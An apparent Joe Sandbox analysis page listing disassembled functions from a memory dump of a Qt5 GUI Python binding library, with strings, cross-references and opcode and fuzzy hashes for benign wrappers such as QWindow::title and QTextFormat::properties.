?familyName@QRawFont@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86278D98

Strings

QRawFont, xrefs: 00007FFD86278DD7
familyName, xrefs: 00007FFD86278DD0
familyName(self) -> str, xrefs: 00007FFD86278DC4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?familyFont@@Name@String@@malloc
String ID: QRawFont$familyName$familyName(self) -> str
API String ID: 231885948-2125083556
Opcode ID: 7ebb4bb4e745c6adb7fa5bc9efff2ed11cedc6c44413aec36d412ebd45b6a851
Instruction ID: 6e67a3dfb29dda0ef5aa181feb05f9feb3fac33169e91f51dd20fc68a0a6a996
Opcode Fuzzy Hash: 7ebb4bb4e745c6adb7fa5bc9efff2ed11cedc6c44413aec36d412ebd45b6a851
Instruction Fuzzy Hash: DA115B75B08A8681EB00EF65E8697AD37A4FF54BA0F954072CA1D03320DF7DD949C740

Function 00007FFD862A6D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?brush@QPaintuserState@@QEBA?AVQBrush@@XZ.QT5GUI ref: 00007FFD862A6D98

Strings

brush(self) -> QBrush, xrefs: 00007FFD862A6DC4
brush, xrefs: 00007FFD862A6DD0
QPaintEngineState, xrefs: 00007FFD862A6DD7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?brush@Brush@@userPaintState@@malloc
String ID: QPaintuserState$brush$brush(self) -> QBrush
API String ID: 3973882522-49382824
Opcode ID: eec27a20a3cbd4189a820d694342bdfcd0ec3cabb0267ad7d77b94b9915fcc2e
Instruction ID: ac9c2a7def6aaa3e99e3682701cefcceda40163a3488e583ae56efb192e0664e
Opcode Fuzzy Hash: eec27a20a3cbd4189a820d694342bdfcd0ec3cabb0267ad7d77b94b9915fcc2e
Instruction Fuzzy Hash: 13111B75B08A4781EB00EF65E8697AD33A4FB54BA4F954072CA4D07360DF7CD949C740

Function 00007FFD86252D20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?minimumSize@QWindow@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FFD86252D78

Strings

minimumSize(self) -> QSize, xrefs: 00007FFD86252DA4
QWindow, xrefs: 00007FFD86252DB7
minimumSize, xrefs: 00007FFD86252DB0

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?minimumSize@Size@@Window@@malloc
String ID: QWindow$minimumSize$minimumSize(self) -> QSize
API String ID: 2343119524-1119001312
Opcode ID: 4d90346dafb0be490918e2db64f98abcf75984b607bb0c7f08f457ea05a1dc83
Instruction ID: 7a7caaf333b1c7e1b7c95353dbb82bbf8a02652fc750706e9af1ed205dd830e5
Opcode Fuzzy Hash: 4d90346dafb0be490918e2db64f98abcf75984b607bb0c7f08f457ea05a1dc83
Instruction Fuzzy Hash: 6A111775B08A4681EB00EF69E8A97AD33A4FF44BA4F954076CA4D03320DF7CD989C340

Function 00007FFD86240D80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?horizontalHeaderItem@QStandardItemModel@@QEBAPEAVQStandardItem@@H@Z.QT5GUI ref: 00007FFD86240DD7

Strings

horizontalHeaderItem, xrefs: 00007FFD86240E0F
horizontalHeaderItem(self, column: int) -> Optional[QStandardItem], xrefs: 00007FFD86240E03
QStandardItemModel, xrefs: 00007FFD86240E16

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Standard$?horizontalHeaderItemItem@Item@@Model@@
String ID: QStandardItemModel$horizontalHeaderItem$horizontalHeaderItem(self, column: int) -> Optional[QStandardItem]
API String ID: 3290676983-2157883827
Opcode ID: 5ae41abf6061d95578febf294bfd3271bc4d82cf67160bfbddef26250015408e
Instruction ID: f81d29503320cb5e9fa6de49a73c6afeda661b7b1cb99559bc3cba006c29d523
Opcode Fuzzy Hash: 5ae41abf6061d95578febf294bfd3271bc4d82cf67160bfbddef26250015408e
Instruction Fuzzy Hash: 53111835B18A56C2EB00DF15E899AAD33B5FB48B94F914072CA5D03320DF39D989C700

Function 00007FFD86294D70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?properties@QTextFormat@@QEBA?AV?$QMap@HVQVariant@@@@XZ.QT5GUI ref: 00007FFD86294DC8

Strings

properties(self) -> Dict[int, Any], xrefs: 00007FFD86294DF4
properties, xrefs: 00007FFD86294E00
QTextFormat, xrefs: 00007FFD86294E07

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?properties@Format@@Map@TextVariant@@@@malloc
String ID: QTextFormat$properties$properties(self) -> Dict[int, Any]
API String ID: 3498833631-3262877666
Opcode ID: c315b032a88b148ac05edc2776a77ea90a5d92ea40298d3e40a9b0b759b6679e
Instruction ID: 6de9a87dfad6457b1d6d9d32eb88904bea97dd3a62978c9ccf1a2c407fad2aae
Opcode Fuzzy Hash: c315b032a88b148ac05edc2776a77ea90a5d92ea40298d3e40a9b0b759b6679e
Instruction Fuzzy Hash: F5111775B08A4682EB00EF69E8A97AD37A4FF84BA4F954072CA5D47320DF7CD949C340

Function 00007FFD86298D60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?accessibleText@QStandardItem@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86298DB8

Strings

accessibleText(self) -> str, xrefs: 00007FFD86298DE4
accessibleText, xrefs: 00007FFD86298DF0
QStandardItem, xrefs: 00007FFD86298DF7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?accessibleItem@@StandardString@@Text@malloc
String ID: QStandardItem$accessibleText$accessibleText(self) -> str
API String ID: 3211834138-3750482454
Opcode ID: f6b3d9bad00faea09185f16d9379a8597d11cc15bf4d6a73a93387dce9bd4954
Instruction ID: c89d7872d8e21b51a50fc7c679cf418a05ccd5676a187118c44cac8807094f93
Opcode Fuzzy Hash: f6b3d9bad00faea09185f16d9379a8597d11cc15bf4d6a73a93387dce9bd4954
Instruction Fuzzy Hash: D9111B75B08A4681EB00DF65E8A97AD37A4FF94BA0F954072CA4D47320DF7CD949C740

Function 00007FFD8623ADD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?pageSize@QTextDocument@@QEBA?AVQSizeF@@XZ.QT5GUI ref: 00007FFD8623AE28

Strings

pageSize(self) -> QSizeF, xrefs: 00007FFD8623AE54
pageSize, xrefs: 00007FFD8623AE60
QTextDocument, xrefs: 00007FFD8623AE67

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?pageDocument@@SizeSize@Textmalloc
String ID: QTextDocument$pageSize$pageSize(self) -> QSizeF
API String ID: 3111946874-3047275152
Opcode ID: f8b16f27eddc8501a30cb6e0b0360d3631ec31d5ba877b384b3ea013d7ad78a8
Instruction ID: 88d4b316cd8dec50e46dab734f90c86d68f805553189e763c28c483bfdb7e808
Opcode Fuzzy Hash: f8b16f27eddc8501a30cb6e0b0360d3631ec31d5ba877b384b3ea013d7ad78a8
Instruction Fuzzy Hash: 9E111775B08A4681EB00EF65E8A97AD33A4FF58BA0F954072CA5D47320DF7CD949C780

Function 00007FFD86272DD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?flags@QTextOption@@QEBA?AV?$QFlags@W4Flag@QTextOption@@@@XZ.QT5GUI ref: 00007FFD86272E28

Strings

flags, xrefs: 00007FFD86272E60
flags(self) -> QTextOption.Flags, xrefs: 00007FFD86272E54
QTextOption, xrefs: 00007FFD86272E67

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?flags@Flag@Flags@Option@@Option@@@@malloc
String ID: QTextOption$flags$flags(self) -> QTextOption.Flags
API String ID: 3421588082-3921848920
Opcode ID: b70b663a2fe4f1c7f63453e53f2789dda4cb45fc962e6b0842ed8f96b5d2bcc3
Instruction ID: b8114066404527c7664fe3c18814f3ddf0773399469604951a3abfcb3e01608c
Opcode Fuzzy Hash: b70b663a2fe4f1c7f63453e53f2789dda4cb45fc962e6b0842ed8f96b5d2bcc3
Instruction Fuzzy Hash: AF111775B08A8681EB00EF65E8A97AD37A4FB54BA0F954072CA5D07720DF7DDA49C380

Function 00007FFD86264DC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?lastCursorPosition@QTextTableCell@@QEBA?AVQTextCursor@@XZ.QT5GUI ref: 00007FFD86264E18

Strings

lastCursorPosition, xrefs: 00007FFD86264E50
QTextTableCell, xrefs: 00007FFD86264E57
lastCursorPosition(self) -> QTextCursor, xrefs: 00007FFD86264E44

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?lastCell@@CursorCursor@@Position@Tablemalloc
String ID: QTextTableCell$lastCursorPosition$lastCursorPosition(self) -> QTextCursor
API String ID: 1492964463-108271912
Opcode ID: 0965d3189cdb50b865a8441b1d1bbec3f09142cbad41d4e40888e3b26fbcee28
Instruction ID: 64c8df886ae316b255d3bd79a9a8a9516297071e5cd928f90dd47eeaca35c542
Opcode Fuzzy Hash: 0965d3189cdb50b865a8441b1d1bbec3f09142cbad41d4e40888e3b26fbcee28
Instruction Fuzzy Hash: 62115B75B08A4681EB00DF55E8697AD33A4FF44BA4F954072CA5D03320DF3CD949C740

Function 00007FFD8624EDA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?title@QWindow@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD8624EDF8

Strings

QWindow, xrefs: 00007FFD8624EE37
title, xrefs: 00007FFD8624EE30
title(self) -> str, xrefs: 00007FFD8624EE24

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
